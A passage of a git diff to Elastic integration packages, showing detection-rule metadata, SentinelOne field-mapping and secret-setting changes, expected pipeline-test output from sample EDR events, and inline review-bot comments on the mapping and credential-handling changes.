If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1055", + "name": "Process Injection", + "reference": "https://attack.mitre.org/techniques/T1055/", + "subtechnique": [ + { + "id": "T1055.008", + "name": "Ptrace System Calls", + "reference": "https://attack.mitre.org/techniques/T1055/008/" + } + ] + }, + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.003", + "name": "Sudo and Sudo Caching", + "reference": "https://attack.mitre.org/techniques/T1548/003/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 5 + }, + "id": "ff9bc8b9-f03b-4283-be58-ee0a16f5a11b_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/manifest.yml b/packages/security_detection_engine/manifest.yml index b5abc0375de..c4269ce27cd 100644 --- a/packages/security_detection_engine/manifest.yml +++ b/packages/security_detection_engine/manifest.yml 
@@ -4,7 +4,7 @@ conditions:
 elastic:
 subscription: basic
 kibana:
- version: ^8.12.0
+ version: ^8.13.0
 description: Prebuilt detection rules for Elastic Security
 format_version: 3.0.0
 icons:
@@ -19,4 +19,4 @@ source:
 license: Elastic-2.0
 title: Prebuilt Security Detection Rules
 type: integration
-version: 8.12.3
+version: 8.13.3
diff --git a/packages/sentinel_one/changelog.yml b/packages/sentinel_one/changelog.yml
index 78b06c0d80b..fc15fc4baa4 100644
--- a/packages/sentinel_one/changelog.yml
+++ b/packages/sentinel_one/changelog.yml
@@ -1,4 +1,9 @@
 # newer versions go on top
+- version: "1.20.0"
+ changes:
+ - description: Set sensitive values as secret and fix incorrect mappings.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9128
 - version: "1.19.2"
 changes:
 - description: Changed owners
diff --git a/packages/sentinel_one/data_stream/threat/fields/fields.yml b/packages/sentinel_one/data_stream/threat/fields/fields.yml
index 84669242933..14ca6f28bf1 100644
--- a/packages/sentinel_one/data_stream/threat/fields/fields.yml
+++ b/packages/sentinel_one/data_stream/threat/fields/fields.yml
@@ -407,10 +407,10 @@
 type: long
 description: Actions counters Total.
 - name: agent_supports_report
- type: keyword
+ type: boolean
 description: The Agent generates a full mitigation report.
 - name: group_not_found
- type: keyword
+ type: boolean
 description: Agent could not find the threat.
 - name: last_update
 type: keyword
diff --git a/packages/sentinel_one/docs/README.md b/packages/sentinel_one/docs/README.md
index a183227df0f..dd32b91f4ad 100644
--- a/packages/sentinel_one/docs/README.md
+++ b/packages/sentinel_one/docs/README.md
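Review bot: Switching `agent_supports_report` and `group_not_found` from `keyword` to `boolean` in the fields.yml hunk (`@@ -407,10 +407,10 @@`) changes the mapping of fields that already-written backing indices hold as keyword, so until those indices roll over the same field name carries two types and queries or aggregations spanning old and new data can fail or return mixed results. The sentinel_one changelog hunk records this as `type: enhancement`; labelling it `type: breaking-change`, or at least mentioning the rollover behaviour in the description, would tell operators why older documents look different. It is also worth confirming that the ingest pipeline (not visible here) emits these two values as booleans or the strings `"true"`/`"false"`, since any other string that previously indexed fine as keyword would now be rejected by the boolean mapping.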
@@ -1644,8 +1644,8 @@ An example event for `threat` looks as following:
 | sentinel_one.threat.mitigation_status.action_counters.pending_reboot | Actions counters Pending reboot. | long |
 | sentinel_one.threat.mitigation_status.action_counters.success | Actions counters Success. | long |
 | sentinel_one.threat.mitigation_status.action_counters.total | Actions counters Total. | long |
-| sentinel_one.threat.mitigation_status.agent_supports_report | The Agent generates a full mitigation report. | keyword |
-| sentinel_one.threat.mitigation_status.group_not_found | Agent could not find the threat. | keyword |
+| sentinel_one.threat.mitigation_status.agent_supports_report | The Agent generates a full mitigation report. | boolean |
+| sentinel_one.threat.mitigation_status.group_not_found | Agent could not find the threat. | boolean |
 | sentinel_one.threat.mitigation_status.last_update | Timestamp of last mitigation status update. | keyword |
 | sentinel_one.threat.mitigation_status.latest_report | Report download URL. If None, there is no report. | keyword |
 | sentinel_one.threat.mitigation_status.mitigation_ended_at | The time the Agent finished the mitigation. | keyword |
diff --git a/packages/sentinel_one/manifest.yml b/packages/sentinel_one/manifest.yml
index 3d9404f6d9c..a1e49bc5ea2 100644
--- a/packages/sentinel_one/manifest.yml
+++ b/packages/sentinel_one/manifest.yml
@@ -1,7 +1,7 @@
-format_version: "3.0.0"
+format_version: "3.0.2"
 name: sentinel_one
 title: SentinelOne
-version: "1.19.2"
+version: "1.20.0"
 description: Collect logs from SentinelOne with Elastic Agent.
 type: integration
 categories:
@@ -9,7 +9,7 @@ categories:
 - edr_xdr
 conditions:
 kibana:
- version: ^8.7.1
+ version: ^8.12.0
 screenshots:
 - src: /img/sentinel-one-screenshot.png
 title: SentinelOne Threat Dashboard Screenshot
@@ -46,6 +46,7 @@ policy_templates:
 title: API Token
 description: API Token with API Access Level type.
 required: true
+ secret: true
 - name: proxy_url
 type: text
 title: Proxy URL
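Review bot: In the `@@ -46,6 +46,7 @@` hunk of sentinel_one/manifest.yml only the API token variable gains `secret: true`, while the neighbouring `proxy_url` variable stays a plain `text` value; proxy URLs are a common place for embedded `user:password@` credentials, so if that form is accepted by the input it would be stored and displayed in the policy in clear text. Either add `secret: true` to `proxy_url` as well (one line after `title: Proxy URL`), or state in its description that credentials must not be placed in the URL. The `kibana` constraint bump to `^8.12.0` in the `@@ -9,7 +9,7 @@` hunk presumably exists to support secret variables, so the two hunks should travel together if this change is ever backported or reverted.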
diff --git a/packages/sentinel_one_cloud_funnel/changelog.yml b/packages/sentinel_one_cloud_funnel/changelog.yml
index 12f2ea32253..43bfbfba90c 100644
--- a/packages/sentinel_one_cloud_funnel/changelog.yml
+++ b/packages/sentinel_one_cloud_funnel/changelog.yml
@@ -1,4 +1,27 @@
 # newer versions go on top
+- version: "0.14.0"
+ changes:
+ - description: Improve `event.type` and `event.action` mappings, fix missing `preserve_original_event` setting for GCS input.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9524
+- version: "0.13.0"
+ changes:
+ - description: Improve detection rules support for process events.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9361
+- version: "0.12.0"
+ changes:
+ - description: Improve detection rules support.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9120
+ - description: Lower kibana version requirement to v8.10.1.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9120
+- version: "0.11.0"
+ changes:
+ - description: Set sensitive values as secret.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9128
 - version: "0.10.1"
 changes:
 - description: Changed owners
diff --git a/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-command-script.log-expected.json b/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-command-script.log-expected.json
index ae7e7cf98fb..b232b9db0b6 100644
--- a/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-command-script.log-expected.json
+++ b/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-command-script.log-expected.json
@@ -21,15 +21,32 @@ }, "host": { "hostname": "asdf1", + "id": "asdf356783457dfds4456d65", "os": { "name": "WindowsServer2019Standard", - "platform": "windows" + "platform": "windows", + "type": "windows" }, "type": "server" }, + "powershell": { + "file": { + "script_block_text": "$global:?" + } + }, "process": { + "args": [ + "powershell.exe-ExecutionPolicyRestricted-CommandWrite-Host'Finalresult:1';" + ], + "args_count": 1, + "code_signature": { + "exists": true, + "subject_name": "MICROSOFTWINDOWS", + "trusted": true + }, "command_line": "powershell.exe-ExecutionPolicyRestricted-CommandWrite-Host'Finalresult:1';", "entity_id": "230B188E26085676", + "executable": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "hash": { "md5": "7353f60b1739074eb17c5f4dddefe239", "sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c", @@ -37,8 +54,13 @@ }, "name": "powershell.exe", "parent": { + "args": [ + "C:\\Windows\\system32\\CompatTelRunner.exe-m:appraiser.dll-f:DoScheduledTelemetryRun-cv:1DRRwZous0W15sCL.2" + ], + "args_count": 1, "command_line": "C:\\Windows\\system32\\CompatTelRunner.exe-m:appraiser.dll-f:DoScheduledTelemetryRun-cv:1DRRwZous0W15sCL.2", "entity_id": "8608188E26085676", + "executable": "C:\\Windows\\System32\\CompatTelRunner.exe", "hash": { "sha1": "134fd2ad04cf59b0c10596230da5daf6fc711bd1", "sha256": "046f009960f70981597cd7b3a1e44cbb4ba5893cc1407734366aa55fbeda5d66" @@ -239,7 +261,11 @@ "tags": [ "preserve_original_event", "preserve_duplicate_custom_fields" - ] + ], + "user": { + "domain": "NTAUTHORITY", + "name": "SYSTEM" + } } ] } \ No newline at end of file diff --git a/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-cross-process.log-expected.json b/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-cross-process.log-expected.json index 0b62ef98240..2568ad83d3e 100644 --- a/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-cross-process.log-expected.json 
+++ b/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-cross-process.log-expected.json @@ -21,15 +21,27 @@ }, "host": { "hostname": "IHM-MP23Y3DD", + "id": "asdf356783457dfds4456d65", "os": { "name": "Windows10Enterprise", - "platform": "windows" + "platform": "windows", + "type": "windows" }, "type": "laptop" }, "process": { + "args": [ + "C:\\ProgramFiles(x86)\\Microsoft\\important_stuff\\stuff.EXE\\" + ], + "args_count": 1, + "code_signature": { + "exists": true, + "subject_name": "GOOGLELLC", + "trusted": true + }, "command_line": "C:\\ProgramFiles(x86)\\Microsoft\\important_stuff\\stuff.EXE\\", "entity_id": "F27AB6F105F6C47A", + "executable": "C:\\ProgramFiles\\Google\\Chrome\\Application\\chrome.exe", "hash": { "md5": "6693974b22d16712c9a164e154c17556", "sha1": "ebec2705217692afae8e9cc5e82d58d78e7d6d89", 
@@ -37,8 +49,13 @@ }, "name": "chrome.exe", "parent": { + "args": [ + "C:\\ProgramFiles\\Google\\Chrome\\Application\\chrome.exe--single-argumenthttps://nam04.safelinks.protection.outlook.com/?url=https%3A%2F%2Fwww.asdf.com%2FCopy%2520A%3Fdl%3D0%26subfolder_nav_tracking%3D1&data=05%7C01%7CCeliaVerPloeg%7C122a5275b9e3%7C0%7C0%7C638000749817681064%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C3000%7C%7C%7C&sdata=Oe8GdP%2Fty%2FFwi58b87FF5qp1VjewxNXjXfEBWVf5urI%3D&reserved=0" + ], + "args_count": 1, "command_line": "\"C:\\ProgramFiles\\Google\\Chrome\\Application\\chrome.exe\"--single-argumenthttps://nam04.safelinks.protection.outlook.com/?url=https%3A%2F%2Fwww.asdf.com%2FCopy%2520A%3Fdl%3D0%26subfolder_nav_tracking%3D1&data=05%7C01%7CCeliaVerPloeg%7C122a5275b9e3%7C0%7C0%7C638000749817681064%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C3000%7C%7C%7C&sdata=Oe8GdP%2Fty%2FFwi58b87FF5qp1VjewxNXjXfEBWVf5urI%3D&reserved=0", "entity_id": "F17AB6F105F6C47A", + "executable": "C:\\ProgramFiles\\Google\\Chrome\\Application\\chrome.exe", "hash": { "sha1": "ebec2705217692afae8e9cc5e82d58d78e7d6d89", "sha256": "a462f776c0935c7359e941d9a23b62243e3eabbd1694065fe2e1dc521e685698" @@ -267,7 +284,11 @@ "tags": [ "preserve_original_event", "preserve_duplicate_custom_fields" - ] + ], + "user": { + "domain": "asdf", + "name": "SYSTEM" + } } ] } \ No newline at end of file diff --git a/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-dns.log-expected.json b/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-dns.log-expected.json index 6ea6f6d6a05..4a6d57d8d73 100644 --- a/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-dns.log-expected.json +++ b/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-dns.log-expected.json 
@@ -2,10 +2,18 @@ "expected": [ { "@timestamp": "2022-10-03T15:32:29.495Z", + "dns": { + "question": { + "name": "vrnorfva01.usa.ccu.clearchannel.com" + } + }, "ecs": { "version": "8.11.0" }, "event": { + "action": [ + "lookup_requested" + ], "category": [ "network" ], 
@@ -13,7 +21,8 @@ "kind": "event", "original": "{\"timestamp\":\"18:32:29.495\",\"src.process.parent.isStorylineRoot\":true,\"event.category\":\"dns\",\"src.process.parent.image.sha1\":\"f9bc4c756eab5121ace7ec1cf6a394be0439dec0\",\"site.id\":\"123456789123456789\",\"osSrc.process.isRedirectCmdProcessor\":false,\"src.process.image.binaryIsExecutable\":true,\"src.process.parent.displayName\":\"VIERO-RMSLaunchBar\",\"osSrc.process.image.md5\":\"f905359ab27db1dda964d77442735cb8\",\"osSrc.process.crossProcessOpenProcessCount\":0,\"osSrc.process.publisher\":\"MICROSOFTWINDOWSPUBLISHER\",\"osSrc.process.crossProcessDupThreadHandleCount\":0,\"src.process.user\":\"asdf\\\\SYSTEM\",\"osSrc.process.indicatorPersistenceCount\":0,\"src.process.parent.subsystem\":\"SYS_WIN32\",\"src.process.indicatorRansomwareCount\":0,\"src.process.crossProcessDupRemoteProcessHandleCount\":0,\"osSrc.process.crossProcessOutOfStorylineCount\":0,\"osSrc.process.image.sha1\":\"bfacfa096a56e3d149634e15e1b6470ff5a03957\",\"src.process.tgtFileCreationCount\":6,\"osSrc.process.childProcCount\":0,\"src.process.indicatorInjectionCount\":0,\"osSrc.process.indicatorReconnaissanceCount\":0,\"src.process.moduleCount\":251,\"src.process.parent.name\":\"VIERO.exe\",\"i.version\":\"preprocess-lib-1.0\",\"osSrc.process.signedStatus\":\"signed\",\"sca:atlantisIngestTime\":1664811166298,\"src.process.image.md5\":\"421f6d5ec86f6b930646321fc6ed2c46\",\"src.process.indicatorReconnaissanceCount\":0,\"src.process.storyline.id\":\"8DD23004051AA366\",\"src.process.childProcCount\":1,\"mgmt.url\":\"asdf-123.sentinelone.org\",\"src.process.crossProcessOpenProcessCount\":0,\"osSrc.process.crossProcessThreadCreateCount\":0,\"osSrc.process.moduleCount\":472,\"osSrc.process.indicatorPostExploitationCount\":0,\"osSrc.process.indicatorInfostealerCount\":0,\"src.process.subsystem\":\"SYS_WIN32\",\"meta.event.name\":\"DNS\",\"src.process.parent.integrityLevel\":\"HIGH\",\"osSrc.process.user\":\"NTAUTHORITY\\\\NETWORKSERVICE\",\"osS
rc.process.image.binaryIsExecutable\":true,\"osSrc.process.tgtFileModificationCount\":0,\"src.process.indicatorExploitationCount\":0,\"osSrc.process.registryChangeCount\":0,\"src.process.parent.storyline.id\":\"8DD23004051AA366\",\"osSrc.process.netConnInCount\":0,\"i.scheme\":\"edr\",\"src.process.integrityLevel\":\"HIGH\",\"osSrc.process.indicatorInjectionCount\":0,\"osSrc.process.pid\":1340,\"site.name\":\"ASDF\",\"src.process.netConnInCount\":0,\"event.time\":1664811149495,\"account.id\":\"123456789123456789\",\"dataSource.name\":\"SentinelOne\",\"osSrc.process.crossProcessCount\":0,\"endpoint.name\":\"asdf1\",\"src.process.image.sha1\":\"d8b12c9072fdcf68ec152befb004add14b5c25b8\",\"src.process.isStorylineRoot\":false,\"src.process.parent.image.path\":\"C:\\\\Users\\\\asdf\\\\AppData\\\\Local\\\\stuff\\\\stuff\\\\Application\\\\stuff\\\\stuff.exe\",\"osSrc.process.isNative64Bit\":false,\"src.process.pid\":3924,\"osSrc.process.uid\":\"73833004051AA366\",\"tgt.file.isSigned\":\"unsigned\",\"sca:ingestTime\":1664811166,\"dataSource.category\":\"security\",\"src.process.cmdline\":\"C:\\\\ProgramFiles(x86)\\\\Microsoft\\\\important_stuff\\\\stuff.EXE\\\\\",\"src.process.crossProcessThreadCreateCount\":0,\"src.process.parent.isNative64Bit\":true,\"osSrc.process.isStorylineRoot\":true,\"src.process.parent.isRedirectCmdProcessor\":false,\"osSrc.process.integrityLevel\":\"SYSTEM\",\"src.process.signedStatus\":\"unsigned\",\"src.process.crossProcessCount\":0,\"osSrc.process.subsystem\":\"SYS_WIN32\",\"event.id\":\"01GEF7MT4CB2DBKG1NGZ8XA7E0_105\",\"osSrc.process.crossProcessDupRemoteProcessHandleCount\":0,\"osSrc.process.tgtFileCreationCount\":0,\"src.process.parent.cmdline\":\"\\\"C:\\\\Users\\\\asdf\\\\AppData\\\\Local\\\\LANInternational\\\\VIERO\\\\Application\\\\7.22.1.105\\\\VIERO.exe\\\"\",\"src.process.image.path\":\"C:\\\\Users\\\\asdf\\\\AppData\\\\Local\\\\LANInternational\\\\VIERO\\\\Application\\\\7.22.1.105\\\\CC.Falcon.OrderModule.exe\",\"src.process.tgtFil
eModificationCount\":4,\"osSrc.process.name\":\"svchost.exe\",\"src.process.indicatorEvasionCount\":26,\"src.process.netConnOutCount\":26,\"osSrc.process.startTime\":1664800506863,\"src.process.crossProcessDupThreadHandleCount\":0,\"endpoint.os\":\"windows\",\"osSrc.process.netConnOutCount\":53,\"osSrc.process.image.sha256\":\"e3d84df77b279ea288cc726cbf68867dc6ae00d24e0e24985141a2ee4753682a\",\"src.process.tgtFileDeletionCount\":6,\"src.process.startTime\":1664803358244,\"mgmt.id\":\"1337\",\"osSrc.process.indicatorRansomwareCount\":0,\"osSrc.process.netConnCount\":53,\"os.name\":\"Windows8.1Pro\",\"osSrc.process.indicatorGeneral.count\":7,\"src.process.displayName\":\"OrderEntryApplication(Client)\",\"osSrc.process.dnsCount\":6126,\"event.dns.request\":\"vrnorfva01.usa.ccu.clearchannel.com\",\"src.process.isNative64Bit\":true,\"src.process.parent.sessionId\":1,\"osSrc.process.sessionId\":0,\"src.process.uid\":\"AFD43004051AA366\",\"src.process.parent.image.md5\":\"1f3d8a05852ee60fb475e86a0ae74e27\",\"osSrc.process.verifiedStatus\":\"verified\",\"osSrc.process.cmdline\":\"C:\\\\WINDOWS\\\\system32\\\\svchost.exe-kNetworkService\",\"src.process.indicatorInfostealerCount\":0,\"src.process.indicatorBootConfigurationUpdateCount\":0,\"process.unique.key\":\"AFD43004051AA366\",\"src.process.parent.uid\":\"8CD23004051AA366\",\"agent.version\":\"22.1.2.217\",\"src.process.parent.image.sha256\":\"d2213413a6a558981670676ff0575e31542067ef69ee7e061c0308c4f0c0888d\",\"src.process.sessionId\":1,\"src.process.netConnCount\":26,\"mgmt.osRevision\":\"9600\",\"osSrc.process.image.path\":\"C:\\\\WINDOWS\\\\System32\\\\svchost.exe\",\"group.id\":\"asdf\",\"osSrc.process.indicatorBootConfigurationUpdateCount\":0,\"src.process.isRedirectCmdProcessor\":false,\"src.process.parent.startTime\":1664802966680,\"osSrc.process.indicatorExploitationCount\":0,\"src.process.dnsCount\":26,\"osSrc.process.tgtFileDeletionCount\":0,\"endpoint.type\":\"laptop\",\"osSrc.process.indicatorEvasionCount\":6,
\"trace.id\":\"01GEF7MT4CB2DBKG1NGZ8XA7E0\",\"src.process.name\":\"CC.Falcon.OrderModule.exe\",\"agent.uuid\":\"asdf356783457dfds4456d65\",\"osSrc.process.displayName\":\"HostProcessforWindowsServices\",\"src.process.image.sha256\":\"ca261f1061485488d08e4c4618b18b42d559f4288dbad3a5c758523347ab3e7c\",\"src.process.indicatorGeneralCount\":6,\"src.process.crossProcessOutOfStorylineCount\":0,\"src.process.registryChangeCount\":0,\"packet.id\":\"1A1DF4D521014F9C90F4CF31E5446B91\",\"src.process.indicatorPersistenceCount\":0,\"src.process.parent.signedStatus\":\"unsigned\",\"src.process.parent.user\":\"asdf\\\\SYSTEM\",\"osSrc.process.storyline.id\":\"74833004051AA366\",\"event.type\":\"DNSUnresolved\",\"src.process.indicatorPostExploitationCount\":0,\"src.process.parent.pid\":2728}", "type": [ - "info" + "info", + "protocol" ] }, "group": { @@ -21,15 +30,25 @@ }, "host": { "hostname": "asdf1", + "id": "asdf356783457dfds4456d65", "os": { "name": "Windows8.1Pro", - "platform": "windows" + "platform": "windows", + "type": "windows" }, "type": "laptop" }, "process": { + "args": [ + "C:\\ProgramFiles(x86)\\Microsoft\\important_stuff\\stuff.EXE\\" + ], + "args_count": 1, + "code_signature": { + "exists": false + }, "command_line": "C:\\ProgramFiles(x86)\\Microsoft\\important_stuff\\stuff.EXE\\", "entity_id": "AFD43004051AA366", + "executable": "C:\\Users\\asdf\\AppData\\Local\\LANInternational\\VIERO\\Application\\7.22.1.105\\CC.Falcon.OrderModule.exe", "hash": { "md5": "421f6d5ec86f6b930646321fc6ed2c46", "sha1": "d8b12c9072fdcf68ec152befb004add14b5c25b8", 
@@ -37,8 +56,13 @@ }, "name": "CC.Falcon.OrderModule.exe", "parent": { + "args": [ + "C:\\Users\\asdf\\AppData\\Local\\LANInternational\\VIERO\\Application\\7.22.1.105\\VIERO.exe" + ], + "args_count": 1, "command_line": "C:\\Users\\asdf\\AppData\\Local\\LANInternational\\VIERO\\Application\\7.22.1.105\\VIERO.exe", "entity_id": "8CD23004051AA366", + "executable": "C:\\Users\\asdf\\AppData\\Local\\stuff\\stuff\\Application\\stuff\\stuff.exe", "hash": { "sha1": "f9bc4c756eab5121ace7ec1cf6a394be0439dec0", "sha256": "d2213413a6a558981670676ff0575e31542067ef69ee7e061c0308c4f0c0888d" @@ -292,7 +316,11 @@ "tags": [ "preserve_original_event", "preserve_duplicate_custom_fields" - ] + ], + "user": { + "domain": "asdf", + "name": "SYSTEM" + } } ] } \ No newline at end of file diff --git a/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-file.log-expected.json b/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-file.log-expected.json index aaddf59e971..4bcf57ed940 100644 --- a/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-file.log-expected.json +++ b/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-file.log-expected.json @@ -6,6 +6,9 @@ "version": "8.11.0" }, "event": { + "action": [ + "creation" + ], "category": [ "file" ], @@ -18,7 +21,10 @@ }, "file": { "created": "2022-10-03T15:32:29.488Z", + "directory": "C:\\PROGRAMFILES\\MediaMonitors\\ChromeProfiles\\profile-1234\\userdata\\Default", + "drive_letter": "C", "mtime": "2022-10-03T15:32:29.488Z", + "name": "Favicons", "path": "C:\\PROGRAMFILES\\MediaMonitors\\ChromeProfiles\\profile-1234\\userdata\\Default\\Favicons", "size": 0, "type": "UNKNOWN" 
@@ -28,15 +34,27 @@ }, "host": { "hostname": "asdf1", + "id": "asdf356783457dfds4456d65", "os": { "name": "Windows10Pro", - "platform": "windows" + "platform": "windows", + "type": "windows" }, "type": "desktop" }, "process": { + "args": [ + "C:\\ProgramFiles(x86)\\Microsoft\\important_stuff\\stuff.EXE\\" + ], + "args_count": 1, + "code_signature": { + "exists": true, + "subject_name": "GOOGLELLC", + "trusted": true + }, "command_line": "C:\\ProgramFiles(x86)\\Microsoft\\important_stuff\\stuff.EXE\\", "entity_id": "BA34D0202623D4E6", + "executable": "C:\\ProgramFiles(x86)\\Google\\Chrome\\Application\\chrome.exe", "hash": { "md5": "32f678531906e17dd7e9508d289c8d0a", "sha1": "2797538e84a534cc5aa2d2700c0d1ca297aaa507", @@ -44,8 +62,13 @@ }, "name": "chrome.exe", "parent": { + "args": [ + "C:\\ProgramFiles\\MediaMonitors\\MediaMonitors.WebCrawler.Desktop.exe" + ], + "args_count": 1, "command_line": "C:\\ProgramFiles\\MediaMonitors\\MediaMonitors.WebCrawler.Desktop.exe", "entity_id": "3F41C4202623D4E6", + "executable": "C:\\PROGRAMFILES\\MediaMonitors\\MediaMonitors.WebCrawler.Desktop.exe", "hash": { "sha1": "cb3d662017fc8f5ca5fd8f843781dc979bc39f3a", "sha256": "bea718b473f35cfc401a8e529ec6461427ed6a2cf7dd819cb1a7895b57e3e5a7" @@ -244,7 +267,11 @@ "tags": [ "preserve_original_event", "preserve_duplicate_custom_fields" - ] + ], + "user": { + "domain": "asdf", + "name": "SYSTEM" + } } ] } \ No newline at end of file diff --git a/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-indicator.log-expected.json b/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-indicator.log-expected.json index 061a5cda919..22cff0e1bbe 100644 --- a/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-indicator.log-expected.json +++ b/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-indicator.log-expected.json 
@@ -15,15 +15,27 @@ }, "host": { "hostname": "asdf1", + "id": "asdf356783457dfds4456d65", "os": { "name": "Windows10Pro", - "platform": "windows" + "platform": "windows", + "type": "windows" }, "type": "desktop" }, "process": { + "args": [ + "C:\\ProgramFiles(x86)\\Microsoft\\important_stuff\\stuff.EXE\\" + ], + "args_count": 1, + "code_signature": { + "exists": true, + "subject_name": "MICROSOFTWINDOWS", + "trusted": true + }, "command_line": "C:\\ProgramFiles(x86)\\Microsoft\\important_stuff\\stuff.EXE\\", "entity_id": "9544B91D29223D1A", + "executable": "C:\\Windows\\System32\\asdf\\WmiApSrv.exe", "hash": { "md5": "72260ce9438a7a9a8a5ba101eda4d6bd", "sha1": "090436b0679559cb2d5e863ad9c9135613f38d77", @@ -31,8 +43,13 @@ }, "name": "WmiApSrv.exe", "parent": { + "args": [ + "C:\\WINDOWS\\system32\\services.exe" + ], + "args_count": 1, "command_line": "C:\\WINDOWS\\system32\\services.exe", "entity_id": "B4C1F07EC98B907A", + "executable": "C:\\Windows\\System32\\services.exe", "hash": { "sha1": "86662690d627002d7cab3285f7be3e6d87b35cfb", "sha256": "9090e0e44e14709fb09b23b98572e0e61c810189e2de8f7156021bc81c3b1bb6" @@ -227,7 +244,11 @@ "tags": [ "preserve_original_event", "preserve_duplicate_custom_fields" - ] + ], + "user": { + "domain": "NTAUTHORITY", + "name": "SYSTEM" + } } ] } \ No newline at end of file diff --git a/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-login.log-expected.json b/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-login.log-expected.json index 20f8bc1b055..3dcbc972b9f 100644 --- a/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-login.log-expected.json +++ b/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-login.log-expected.json 
@@ -13,14 +13,16 @@ "kind": "event", "original": "{\"timestamp\":\"18:32:29.467\",\"event.category\":\"logins\",\"site.id\":\"123456789123456789\",\"src.process.user\":\"NTAUTHORITY\\\\SYSTEM\",\"src.process.indicatorRansomwareCount\":0,\"src.process.crossProcessDupRemoteProcessHandleCount\":0,\"src.process.tgtFileCreationCount\":23,\"src.process.indicatorInjectionCount\":0,\"src.process.moduleCount\":180,\"i.version\":\"preprocess-lib-1.0\",\"sca:atlantisIngestTime\":1664811157561,\"src.process.indicatorReconnaissanceCount\":0,\"src.process.childProcCount\":0,\"mgmt.url\":\"asdf-123.sentinelone.org\",\"src.process.crossProcessOpenProcessCount\":20668,\"src.process.subsystem\":\"SYS_WIN32\",\"meta.event.name\":\"WINLOGONATTEMPT\",\"event.login.type\":\"NETWORK\",\"src.process.indicatorExploitationCount\":0,\"event.login.loginIsSuccessful\":true,\"src.process.integrityLevel\":\"SYSTEM\",\"i.scheme\":\"edr\",\"site.name\":\"ASDF\",\"src.process.netConnInCount\":0,\"event.time\":1664811149467,\"account.id\":\"123456789123456789\",\"dataSource.name\":\"SentinelOne\",\"endpoint.name\":\"asdf1\",\"src.process.isStorylineRoot\":false,\"src.process.pid\":776,\"sca:ingestTime\":1664811157,\"dataSource.category\":\"security\",\"src.process.crossProcessThreadCreateCount\":0,\"src.process.crossProcessCount\":20668,\"event.id\":\"01GEF7MHHR6BB9SJNBMVFMQP5X_431\",\"event.login.accountName\":\"-\",\"src.process.tgtFileModificationCount\":159,\"src.process.indicatorEvasionCount\":0,\"src.process.netConnOutCount\":24905,\"src.process.crossProcessDupThreadHandleCount\":0,\"endpoint.os\":\"windows\",\"src.process.tgtFileDeletionCount\":23,\"src.process.startTime\":1664084384297,\"mgmt.id\":\"1337\",\"os.name\":\"WindowsServer2016Datacenter\",\"src.process.isNative64Bit\":false,\"src.process.uid\":\"61D19661DB864A92\",\"event.login.sessionId\":0,\"src.process.indicatorBootConfigurationUpdateCount\":0,\"src.process.indicatorInfostealerCount\":0,\"process.unique.key\":\"61D19661DB864A92\
